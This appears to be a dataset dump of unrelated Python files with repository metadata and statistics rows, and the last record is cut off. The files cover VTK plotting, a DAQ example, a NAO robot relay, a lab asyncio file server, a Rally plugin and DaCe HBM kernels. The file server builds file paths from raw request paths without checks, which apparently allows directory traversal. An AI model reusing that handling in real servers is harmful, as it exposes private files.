plane3.SetExtent(45, 45, 1, 100, 1, 100)
# We use an append filter because that way we can do the warping,
# etc. just using a single pipeline and actor.
appendF = vtk.vtkAppendPolyData()
appendF.AddInputConnection(plane.GetOutputPort())
appendF.AddInputConnection(plane2.GetOutputPort())
appendF.AddInputConnection(plane3.GetOutputPort())
warp = vtk.vtkWarpScalar()
warp.SetInputConnection(appendF.GetOutputPort())
warp.UseNormalOn()
warp.SetNormal(1.0, 0.0, 0.0)
warp.SetScaleFactor(2.5)
normals = vtk.vtkPolyDataNormals()
normals.SetInputConnection(warp.GetOutputPort())
normals.SetFeatureAngle(60)
planeMapper = vtk.vtkPolyDataMapper()
planeMapper.SetInputConnection(normals.GetOutputPort())
planeMapper.SetScalarRange(pl3d_output.GetScalarRange())
planeActor = vtk.vtkActor()
planeActor.SetMapper(planeMapper)
# The outline provides context for the data and the planes.
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(pl3d_output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create the usual graphics stuff.
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren.AddActor(outlineActor)
ren.AddActor(planeActor)
ren.SetBackground(1, 1, 1)
renWin.SetSize(500, 500)
# Create an initial view.
cam1 = ren.GetActiveCamera()
cam1.SetClippingRange(3.95297, 50)
cam1.SetFocalPoint(8.88908, 0.595038, 29.3342)
cam1.SetPosition(-12.3332, 31.7479, 41.2387)
cam1.SetViewUp(0.060772, -0.319905, 0.945498)
iren.Initialize()
renWin.Render()
iren.Start()
| 35.236559
| 70
| 0.790357
| 435
| 3,277
| 5.926437
| 0.485057
| 0.023274
| 0.034135
| 0.00931
| 0.018619
| 0.018619
| 0
| 0
| 0
| 0
| 0
| 0.0541
| 0.103143
| 3,277
| 92
| 71
| 35.619565
| 0.823069
| 0.32072
| 0
| 0
| 0
| 0
| 0.014519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.033333
| 0
| 0.033333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee05a479ec4cb10a4599fc18fc14885ce8e8c098
| 1,751
|
py
|
Python
|
examples/console/a_in.py
|
Picarro-kskog/mcculw
|
5a00dfbef2426772f0ec381f7795a2d5fd696a76
|
[
"MIT"
] | null | null | null |
examples/console/a_in.py
|
Picarro-kskog/mcculw
|
5a00dfbef2426772f0ec381f7795a2d5fd696a76
|
[
"MIT"
] | null | null | null |
examples/console/a_in.py
|
Picarro-kskog/mcculw
|
5a00dfbef2426772f0ec381f7795a2d5fd696a76
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, division, print_function
from builtins import * # @UnusedWildImport
from mcculw import ul
from mcculw.ul import ULError
from examples.console import util
from examples.props.ai import AnalogInputProps
use_device_detection = True
def run_example():
board_num = 0
if use_device_detection:
ul.ignore_instacal()
if not util.config_first_detected_device(board_num):
print("Could not find device.")
return
channel = 0
ai_props = AnalogInputProps(board_num)
if ai_props.num_ai_chans < 1:
util.print_unsupported_example(board_num)
return
ai_range = ai_props.available_ranges[0]
try:
# Get a value from the device
if ai_props.resolution <= 16:
# Use the a_in method for devices with a resolution <= 16
value = ul.a_in(board_num, channel, ai_range)
# Convert the raw value to engineering units
eng_units_value = ul.to_eng_units(board_num, ai_range, value)
else:
# Use the a_in_32 method for devices with a resolution > 16
# (optional parameter omitted)
value = ul.a_in_32(board_num, channel, ai_range)
# Convert the raw value to engineering units
eng_units_value = ul.to_eng_units_32(board_num, ai_range, value)
# Display the raw value
print("Raw Value: " + str(value))
# Display the engineering value
print("Engineering Value: " + '{:.3f}'.format(eng_units_value))
except ULError as e:
util.print_ul_error(e)
finally:
if use_device_detection:
ul.release_daq_device(board_num)
if __name__ == '__main__':
run_example()
| 29.677966
| 76
| 0.65791
| 235
| 1,751
| 4.604255
| 0.344681
| 0.066543
| 0.049908
| 0.036969
| 0.292052
| 0.214418
| 0.214418
| 0.15342
| 0.15342
| 0.15342
| 0
| 0.013333
| 0.271845
| 1,751
| 58
| 77
| 30.189655
| 0.835294
| 0.186179
| 0
| 0.111111
| 0
| 0
| 0.046643
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.166667
| 0
| 0.25
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee05eaf652dcacea5d625e928ba76476b8f2f36d
| 721
|
py
|
Python
|
Communication_adaptor/OOCSI/main.py
|
tahir80/Crowd_of_Oz
|
a79e1e8a10b99879aeff83b00ef89b480c8d168c
|
[
"MIT"
] | null | null | null |
Communication_adaptor/OOCSI/main.py
|
tahir80/Crowd_of_Oz
|
a79e1e8a10b99879aeff83b00ef89b480c8d168c
|
[
"MIT"
] | 3
|
2021-03-19T03:45:27.000Z
|
2022-01-13T01:38:22.000Z
|
Communication_adaptor/OOCSI/main.py
|
tahir80/Crowd_of_Oz
|
a79e1e8a10b99879aeff83b00ef89b480c8d168c
|
[
"MIT"
] | 2
|
2020-02-19T13:58:03.000Z
|
2022-01-17T19:42:02.000Z
|
from oocsi import OOCSI
from NAO_Speak import NAO_Speak # (file name followed by class name)
import unidecode
#################################
IP = "IP_OF_PEPPER_ROBOT"
text = ""
my_nao = NAO_Speak(IP, 9559)
##################################
def receiveEvent(sender, recipient, event):
print('from ', sender, ' -> ', event)
# this will convert unicode string to plain string
msg = str(event['message'])
sender = str(sender)
x, y = sender.split('_')
if x == 'webclient':
my_nao.say_text(msg)
if __name__ == "__main__":
#o = OOCSI('abc', "oocsi.id.tue.nl", callback=receiveEvent)
o = OOCSI('pepper_receiver', 'oocsi.id.tue.nl')
o.subscribe('__test123__', receiveEvent)
| 25.75
| 69
| 0.599168
| 90
| 721
| 4.544444
| 0.555556
| 0.05868
| 0.0489
| 0.05868
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011864
| 0.181692
| 721
| 27
| 70
| 26.703704
| 0.681356
| 0.195562
| 0
| 0
| 0
| 0
| 0.182711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.1875
| 0
| 0.25
| 0.0625
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee06d5c5bec6e01c97e370a892a4bf6a429c5e09
| 8,161
|
py
|
Python
|
CS305_Computer-Network/Lab6-cdn-dash/web_file_system_server.py
|
Eveneko/SUSTech-Courses
|
0420873110e91e8d13e6e85a974f1856e01d28d6
|
[
"MIT"
] | 4
|
2020-11-11T11:56:57.000Z
|
2021-03-11T10:05:09.000Z
|
CS305_Computer-Network/Lab6-cdn-dash/web_file_system_server.py
|
Eveneko/SUSTech-Courses
|
0420873110e91e8d13e6e85a974f1856e01d28d6
|
[
"MIT"
] | null | null | null |
CS305_Computer-Network/Lab6-cdn-dash/web_file_system_server.py
|
Eveneko/SUSTech-Courses
|
0420873110e91e8d13e6e85a974f1856e01d28d6
|
[
"MIT"
] | 3
|
2021-01-07T04:14:11.000Z
|
2021-04-27T13:41:36.000Z
|
# encoding:utf-8
import asyncio
import os
import mimetypes
from urllib import parse
response = {
# 200: [b'HTTP/1.0 200 OK\r\n', # 正常的response
# b'Connection: close\r\n',
# b'Content-Type:text/html; charset=utf-8\r\n',
# b'\r\n'],
404: [b'HTTP/1.0 404 Not Found\r\n', # 请求文件不存在的response
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>404 Not Found<body></html>\r\n',
b'\r\n'],
405: [b'HTTP/1.0 405 Method Not Allowed\r\n', # 请求为GET/HEAD之外的request时的response
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>405 Method Not Allowed<body></html>\r\n',
b'\r\n'],
416: [b'HTTP/1.0 416 Requested Range Not Satisfiable\r\n', # Range Header error
b'Connection: close\r\n',
b'Content-Type:text/html; charset=utf-8\r\n',
b'\r\n',
b'<html><body>416 Requested Range Not Satisfiable<body></html>\r\n',
b'\r\n']
}
# get mime by mimetypes.guess_type
def get_mime(path):
mime = mimetypes.guess_type(path)[0] # 返回文件类型,由浏览器决定怎么打开,或者下载
if mime is None: # 如果浏览器不支持打开,就下载
mime = 'application/octet-stream'
return mime
# seperate the raw cookie info to get the location
def get_cookie(raw_cookie):
for content in raw_cookie:
cookie = content.strip('\r\n').split(' ')
for sub_cookie in cookie:
if 'loc=' in sub_cookie:
return sub_cookie.strip(';').replace('path=/', '')
async def dispatch(reader, writer):
header = {}
while True:
data = await reader.readline()
if data == b'\r\n':
break
if data == b'':
break
message = data.decode().split(' ')
# seperate the header and store in the dictionary
if message[0] == 'GET' or message[0] == 'HEAD':
header['METHOD'] = message[0]
header['PATH'] = message[1]
if message[0] == 'Range:':
header['RANGE'] = message[1]
if message[0] == 'Cookie:':
header['COOKIE'] = message
if message[0] == 'Referer:':
header['REFERER'] = message[1]
if message[0] == 'Host:':
header['HOST'] = message[1]
"""test start"""
print('----------header')
print(header)
print('----------header')
"""test end"""
# Handle the header
r_head = []
r = []
if 'METHOD' not in header:
# if the request is not GET or HEAD
writer.writelines(response[405])
await writer.drain()
writer.close()
return
cookie = ''
if 'COOKIE' in header:
# get the location
cookie = get_cookie(header['COOKIE'])
"""test start"""
# print('----------cookie')
# print(cookie)
# print('----------cookie')
"""test end"""
# set http status
if 'RANGE' in header:
r_head.append(b'HTTP/1.0 206 Partial Content\r\n')
else:
if header['PATH'] == '/' and 'REFERER' not in header and 'COOKIE' in header and \
'loc=' in cookie and cookie != 'loc=/':
r_head.append(b'HTTP/1.0 302 Found\r\n')
else:
r_head.append(b'HTTP/1.0 200 OK\r\n')
# make the 302 header
if header['PATH'] == '/' and 'REFERER' not in header and 'COOKIE' in header and \
'loc=' in cookie and cookie != 'loc=/':
cookie_loc = cookie[4:]
header['HOST'] = header['HOST'].strip('\r\n')
url = 'http://' + header['HOST'] + cookie_loc
"""test start"""
print('----------url')
print(url)
print('----------url')
"""test end"""
r_head.append('Location: {}\r\n\r\n'.format(url).encode('utf-8'))
# set max-age for a day
r_head.append('Cache-control: private; max-age={}\r\n\r\n'.format(86400).encode('utf-8'))
print(r_head)
writer.writelines(r_head)
await writer.drain()
writer.close()
return
# if header['PATH'] == 'favicon.ico': # Chrome会多发一个这样的包,忽略
# pass
# else:
path = './' + header['PATH']
try: # url解码
path = parse.unquote(path, errors='surrogatepass')
except UnicodeDecodeError:
path = parse.unquote(path)
if os.path.isfile(path): # 判断是否为文件
file_size = int(os.path.getsize(path))
start_index = 0
end_index = file_size - 1
length = file_size
if 'RANGE' in header:
# divide the piece of file
start_index, end_index = header['RANGE'].strip('bytes=').split('-')
# -
if start_index == '' and end_index == '' or end_index == '\r\n':
start_index, end_index = 0, file_size-1
# x-
elif end_index == '' or end_index == '\r\n':
start_index, end_index = int(start_index), file_size-1
# -x
elif start_index == '':
end_index = int(end_index)
start_index = file_size - end_index
end_index = file_size - 1
# x-x
start_index = int(start_index)
end_index = int(end_index)
length = end_index - start_index + 1
if start_index < 0 or end_index >= file_size or start_index > end_index:
writer.writelines(response[416])
await writer.drain()
writer.close()
return
r_head.append(
'Content-Range: bytes {}-{}/{}\r\n'.format(start_index, end_index, file_size).encode('utf-8'))
# guess the type
mime = get_mime(path)
r_head.append('Content-Type: {}\r\n'.format(mime).encode('utf-8'))
r_head.append('Content-Length: {}\r\n'.format(length).encode('utf-8'))
r_head.append(b'Connection: close\r\n')
r_head.append(b'\r\n')
writer.writelines(r_head)
if header['METHOD'] == 'GET':
file = open(path, 'rb')
file.seek(start_index)
writer.write(file.read(length))
file.close()
elif os.path.isdir(path): # 判断是否为文件夹
r_head.append(b'Connection: close\r\n')
r_head.append(b'Content-Type:text/html; charset=utf-8\r\n')
r_head.append('Set-Cookie: loc={};path=/\r\n'.format(header['PATH']).encode('utf-8'))
r_head.append(b'\r\n')
if header['METHOD'] == 'HEAD':
writer.writelines(r_head)
elif header['METHOD'] == 'GET':
writer.writelines(r_head)
file_list = os.listdir(path) # 获取文件夹内文件名
r.append(b'<html>')
r.append(b'<head><title>Index of %s</title></head>' %
(path.encode('utf-8')))
r.append(b'<body bgcolor="white">')
r.append(b'<h1>Index of %s</h1><hr>' %
(path.encode('utf-8')))
r.append(b'<ul>')
if path != './':
r.append(b'<li><a href=".."> ../ </a></li>')
for name in file_list:
if os.path.isdir(path + name + '/'):
name = name + '/'
r.append(b'<li><a href="%s"> %s </a></li>' %
(name.encode('utf-8'), name.encode('utf-8')))
r.append(b'</ul>')
r.append(b'</body>')
r.append(b'</html>')
writer.writelines(r)
else:
writer.writelines(response[404])
await writer.drain()
writer.close()
if __name__ == '__main__':
loop = asyncio.get_event_loop() # 创建事件循环
coro = asyncio.start_server(
dispatch, '127.0.0.1', 8080, loop=loop) # 开启一个新的协程
server = loop.run_until_complete(coro) # 将协程注册到事件循环
# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
server.close() # 关闭服务
# 保持等待,直到数据流关闭。保持等待,直到底层连接被关闭,应该在close()后调用此方法。
loop.run_until_complete(server.wait_closed())
loop.close()
| 36.433036
| 110
| 0.527754
| 1,056
| 8,161
| 3.989583
| 0.189394
| 0.020413
| 0.009969
| 0.022787
| 0.316639
| 0.239497
| 0.202943
| 0.145502
| 0.138856
| 0.138856
| 0
| 0.021739
| 0.306703
| 8,161
| 223
| 111
| 36.596413
| 0.72287
| 0.107585
| 0
| 0.299435
| 0
| 0
| 0.197398
| 0.026581
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011299
| false
| 0.011299
| 0.022599
| 0
| 0.062147
| 0.045198
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee0caea10657e730ca0edcf6cea3ad5049994afa
| 2,111
|
py
|
Python
|
rally/rally-plugins/glance/glance_create_boot_delete.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
rally/rally-plugins/glance/glance_create_boot_delete.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
rally/rally-plugins/glance/glance_create_boot_delete.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | 1
|
2019-12-01T14:35:28.000Z
|
2019-12-01T14:35:28.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rally.plugins.openstack.scenarios.glance.images import GlanceBasic
from rally.plugins.openstack.scenarios.neutron import utils as neutron_utils
from rally.plugins.openstack.scenarios.nova import utils as nova_utils
from rally.task import scenario
from rally.task import types
from rally.task import validation
from rally import consts
@types.convert(flavor={"type": "nova_flavor"}, image_location={"type": "path_or_url"})
@validation.add("required_services",
services=[consts.Service.GLANCE, consts.Service.NEUTRON, consts.Service.NOVA])
@validation.add("required_platform", platform="openstack", users=True)
@scenario.configure(context={"cleanup@openstack": ["glance", "neutron", "nova"]},
name="BrowbeatPlugin.glance_create_boot_delete",
platform="openstack")
class GlanceCreateBootDelete(GlanceBasic, neutron_utils.NeutronScenario, nova_utils.NovaScenario):
def run(self, container_format, image_location, disk_format, flavor,
network_create_args=None, subnet_create_args=None, **kwargs):
image = self.glance.create_image(
container_format=container_format, image_location=image_location,
disk_format=disk_format)
net = self._create_network(network_create_args or {})
self._create_subnet(net, subnet_create_args or {})
kwargs['nics'] = [{'net-id': net['network']['id']}]
server = self._boot_server(image.id, flavor, **kwargs)
self._delete_server(server)
self.glance.delete_image(image.id)
| 50.261905
| 98
| 0.732828
| 272
| 2,111
| 5.540441
| 0.426471
| 0.041805
| 0.031851
| 0.049768
| 0.067684
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002273
| 0.166272
| 2,111
| 41
| 99
| 51.487805
| 0.853977
| 0.252487
| 0
| 0
| 0
| 0
| 0.111893
| 0.025575
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.269231
| 0
| 0.346154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee0cf6c256acb1e19d545ad5310115b214f0b6ae
| 11,168
|
py
|
Python
|
Evaluation/hbm_axpy_dot_based.py
|
jnice-81/FpgaHbmForDaCe
|
b80749524264b4884cbd852d2db825cf8a6007aa
|
[
"BSD-3-Clause"
] | null | null | null |
Evaluation/hbm_axpy_dot_based.py
|
jnice-81/FpgaHbmForDaCe
|
b80749524264b4884cbd852d2db825cf8a6007aa
|
[
"BSD-3-Clause"
] | null | null | null |
Evaluation/hbm_axpy_dot_based.py
|
jnice-81/FpgaHbmForDaCe
|
b80749524264b4884cbd852d2db825cf8a6007aa
|
[
"BSD-3-Clause"
] | null | null | null |
from typing import List
import dace
from dace import subsets
from dace import memlet
from dace import dtypes
from dace.sdfg.sdfg import InterstateEdge, SDFG
from dace.sdfg.state import SDFGState
from dace.transformation.interstate.sdfg_nesting import NestSDFG
from dace.transformation.optimizer import Optimizer
from dace.transformation.interstate import InlineSDFG, FPGATransformSDFG
from dace.transformation.dataflow import StripMining
from dace.sdfg import graph, nodes, propagation, utils
from dace.libraries.blas.nodes import dot
from hbm_transform import HbmTransform
from hbm_bank_split import HbmBankSplit
from hbm_transform import set_shape
from hbm_transform import transform_sdfg_for_hbm
from hbm_transform import all_innermost_edges
from helper import *
######## Simple base versions of the pure blas applications without HBM use
def simple_vadd_sdfg(N, vec_len=16, tile_size=4096):
alpha = dace.symbol("alpha", dtype=dace.float32)
@dace.program
def axpy(x: dace.vector(dace.float32, vec_len)[N/vec_len],
y: dace.vector(dace.float32, vec_len)[N/vec_len],
z: dace.vector(dace.float32, vec_len)[N/vec_len]):
for i in dace.map[0:N/vec_len]:
with dace.tasklet:
xin << x[i]
yin << y[i]
zout >> z[i]
zout = xin + yin * alpha
sdfg = axpy.to_sdfg()
sdfg.apply_strict_transformations()
sdfg.apply_transformations(StripMining, {"tile_size": tile_size, "divides_evenly": True})
map = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.MapEntry) and x.map.params[0] == "i")
map.map.schedule = dtypes.ScheduleType.FPGA_Device
return sdfg
def simple_dot_sdfg(N, tile_size=8192):
sdfg: SDFG = SDFG("dot")
state = sdfg.add_state()
sdfg.add_array("x", [N/8], dace.vector(dace.float32, 8), dtypes.StorageType.FPGA_Global)
sdfg.add_array("y", [N/8], dace.vector(dace.float32, 8), dtypes.StorageType.FPGA_Global)
sdfg.add_array("result", [1], dace.float32, dtypes.StorageType.FPGA_Global)
lib_node = dot.Dot("dot")
state.add_node(lib_node)
read_x = state.add_read("x")
read_y = state.add_read("y")
write_result = state.add_write("result")
state.add_edge(read_x, None, lib_node, "_x", memlet.Memlet("x"))
state.add_edge(read_y, None, lib_node, "_y", memlet.Memlet("y"))
state.add_edge(lib_node, "_result", write_result, None, memlet.Memlet(f"result"))
lib_node.implementation = "FPGA_PartialSums"
lib_node.expand(sdfg, state, partial_width=64, n=N)
sdfg.arrays["x"].storage = dtypes.StorageType.Default
sdfg.arrays["y"].storage = dtypes.StorageType.Default
sdfg.arrays["result"].storage = dtypes.StorageType.Default
strip_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream")
for nsdfg in sdfg.all_sdfgs_recursive():
if nsdfg.states()[0].label == "stream":
StripMining.apply_to(nsdfg, {"tile_size": tile_size, "divides_evenly": True}, _map_entry=strip_map)
state = nsdfg.start_state
tile_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream"
and x.map.params[0] == "i")
tile_map.map.schedule = dtypes.ScheduleType.FPGA_Device
break
return sdfg
######### On Device HBM-implementations of pure blas
def hbm_axpy_sdfg(banks_per_input: int):
N = dace.symbol("N")
sdfg = simple_vadd_sdfg(N)
map = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.MapEntry) and x.map.params[0] == "tile_i")
banks = {"x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"z": ("HBM", f"{2*banks_per_input}:{3*banks_per_input}", [banks_per_input])}
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input), banks, {(map, 0): banks_per_input})
return sdfg
def hbm_dot_sdfg(banks_per_input: int):
N = dace.symbol("N")
sdfg = simple_dot_sdfg(N)
state = sdfg.states()[0]
for edge, state in sdfg.all_edges_recursive():
if isinstance(edge, graph.MultiConnectorEdge):
if isinstance(edge.dst, nodes.AccessNode) and edge.dst.data == "_result":
edge.data.other_subset = subsets.Range.from_string("k")
set_shape(state.parent.arrays["_result"], [banks_per_input])
if isinstance(edge.dst, nodes.AccessNode) and edge.dst.data == "result":
#one cannot update the other_subset. Leads to problems with out of bounds checking
#edge.data.other_subset = subsets.Range.from_string("k")
set_shape(state.parent.arrays["result"], [banks_per_input])
array_banks = {"x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"result": ("DDR", "0", None)}
div_map = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and x.label == "stream"
and x.map.params[0] == "tile_i")
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input),
array_banks, {(div_map.map, 0): banks_per_input}, True)
return sdfg
######### Full implementations of pure blas applications
def only_hbm_axpy_sdfg(banks_per_input: int):
sdfg = hbm_axpy_sdfg(banks_per_input)
sdfg.apply_fpga_transformations()
sdfg.apply_transformations_repeated(InlineSDFG)
z_access1 = get_first_node(sdfg.start_state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "z")
sdfg.start_state.remove_nodes_from([sdfg.start_state.out_edges(z_access1)[0].dst, z_access1])
distribute_along_dim0(sdfg, ["x", "y", "z"])
return sdfg
def _modify_dot_host_side(sdfg, start_state, end_state):
# Add final reduction
state = end_state
host_result = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
sum_up = state.add_reduce("lambda a, b : a + b", None, 0)
sdfg.add_array("final_result", [1], dace.float32)
host_final = state.add_access("final_result")
state.add_edge(host_result, None, sum_up, None, memlet.Memlet("result"))
state.add_edge(sum_up, None, host_final, None, memlet.Memlet("final_result[0]"))
sum_up.expand(sdfg, state)
sdfg.apply_transformations(InlineSDFG)
# Remove copy result
state = start_state
access_result_start = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
state.remove_nodes_from([state.out_edges(access_result_start)[0].dst, access_result_start])
sdfg.arrays["result"].transient = True
def only_hbm_dot_sdfg(banks_per_input: int):
sdfg = hbm_dot_sdfg(banks_per_input)
sdfg.apply_fpga_transformations()
sdfg.apply_transformations_repeated(InlineSDFG)
distribute_along_dim0(sdfg, ["x", "y"])
_modify_dot_host_side(sdfg, sdfg.start_state, sdfg.states()[2])
return sdfg
def hbm_axpy_dot(banks_per_input: int):
N = dace.symbol("N")
axpy_sdfg = simple_vadd_sdfg(N, vec_len=8, tile_size=8192)
dot_sdfg = simple_dot_sdfg(N, tile_size=8192)
sdfg = SDFG("axpydot")
sdfg.add_symbol("alpha", dace.float32)
state = sdfg.add_state()
sdfg.add_array("axpy_x", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("axpy_y", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("dot_y", [N//8], dace.vector(dace.float32, 8))
sdfg.add_array("middle", [N//8], dace.vector(dace.float32, 8), transient=True)
sdfg.add_array("result", [banks_per_input], dace.float32)
acc_axpy_x = state.add_access("axpy_x")
acc_axpy_y = state.add_access("axpy_y")
acc_dot_y = state.add_access("dot_y")
acc_middle = state.add_access("middle")
acc_result = state.add_access("result")
axpynode = state.add_nested_sdfg(axpy_sdfg, sdfg, set(["x", "y", "z"]), set(["z"]), {"N": N, "alpha": "alpha"})
dotnode = state.add_nested_sdfg(dot_sdfg, sdfg, set(["x", "y", "result"]), set(["result"]), {"N": N})
acc_middle_dummy = state.add_access("middle")
acc_middle_dummy_2 = state.add_access("middle")
acc_result_dummy = state.add_access("result")
state.add_edge(acc_axpy_x, None, axpynode, "x", memlet.Memlet("axpy_x"))
state.add_edge(acc_axpy_y, None, axpynode, "y", memlet.Memlet("axpy_y"))
state.add_edge(acc_middle_dummy, None, axpynode, "z", memlet.Memlet("middle"))
state.add_edge(axpynode, "z", acc_middle, None, memlet.Memlet("middle"))
state.add_edge(acc_middle_dummy_2, None, dotnode, "x", memlet.Memlet("middle"))
state.add_edge(acc_dot_y, None, dotnode, "y", memlet.Memlet("dot_y"))
state.add_edge(acc_result_dummy, None, dotnode, "result", memlet.Memlet("result"))
state.add_edge(dotnode, "result", acc_result, None, memlet.Memlet("result"))
sdfg.apply_transformations_repeated(InlineSDFG)
def _nodes_from_path(path):
nodes = [path[0].src]
for edge in path:
nodes.append(edge.dst)
return nodes
sdfg.add_stream("connect", dace.vector(dace.float32, 8), 128, [banks_per_input],
storage=dtypes.StorageType.FPGA_Local, transient=True)
old_acc_node = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "middle"
and state.in_degree(x) == 1)
update_access(state, old_acc_node, "connect", memlet.Memlet("connect[k]"))
old_acc_node = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "middle"
and state.out_degree(x) == 1)
update_access(state, old_acc_node, "connect", memlet.Memlet("connect[k]"))
acc_result = get_first_node(state, lambda x: isinstance(x, nodes.AccessNode) and x.data == "result")
path = state.memlet_path(state.in_edges(acc_result)[0])
path[0].data.subset = subsets.Range.from_string("k")
modification_map_axpy = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and
"axpy" in x.label and x.params[0] == "tile_i")
modification_map_dot = get_first_node(state, lambda x: isinstance(x, nodes.MapEntry) and
x.label == "stream" and x.params[0] == "tile_i")
array_updates = {"axpy_x": ("HBM", f"0:{banks_per_input}", [banks_per_input]),
"axpy_y": ("HBM", f"{banks_per_input}:{2*banks_per_input}", [banks_per_input]),
"dot_y": ("HBM", f"{2*banks_per_input}:{3*banks_per_input}", [banks_per_input]),
"result": ("DDR", "0", None)}
transform_sdfg_for_hbm(sdfg, ("k", banks_per_input), array_updates,
{(modification_map_axpy, 0): banks_per_input, (modification_map_dot, 0): banks_per_input})
# Fpga transform cannot be applied here, because stream is not in a map, and because there
# are FPGA storagetypes and schedules around. However since the actual application of
# FPGATransform works non-destructive we just force application here
fpga_xform = FPGATransformSDFG(sdfg.sdfg_id, -1, {}, -1)
fpga_xform.apply(sdfg)
sdfg.apply_transformations_repeated(InlineSDFG)
_modify_dot_host_side(sdfg, sdfg.start_state, sdfg.states()[2])
return sdfg
| 46.92437
| 115
| 0.689201
| 1,642
| 11,168
| 4.4324
| 0.13581
| 0.042869
| 0.069662
| 0.039297
| 0.513053
| 0.471833
| 0.413438
| 0.369195
| 0.355455
| 0.327013
| 0
| 0.01232
| 0.171472
| 11,168
| 238
| 116
| 46.92437
| 0.774235
| 0.051218
| 0
| 0.151351
| 0
| 0
| 0.080659
| 0.017893
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.102703
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee0db8b98c1815168cdf176d5c487ac08d4df051
| 1,134
|
py
|
Python
|
aiida_vasp/parsers/file_parsers/wavecar.py
|
muhrin/aiida-vasp
|
641fdc2ccd40bdd041e59af1fa3e1dcf9b037415
|
[
"MIT"
] | 1
|
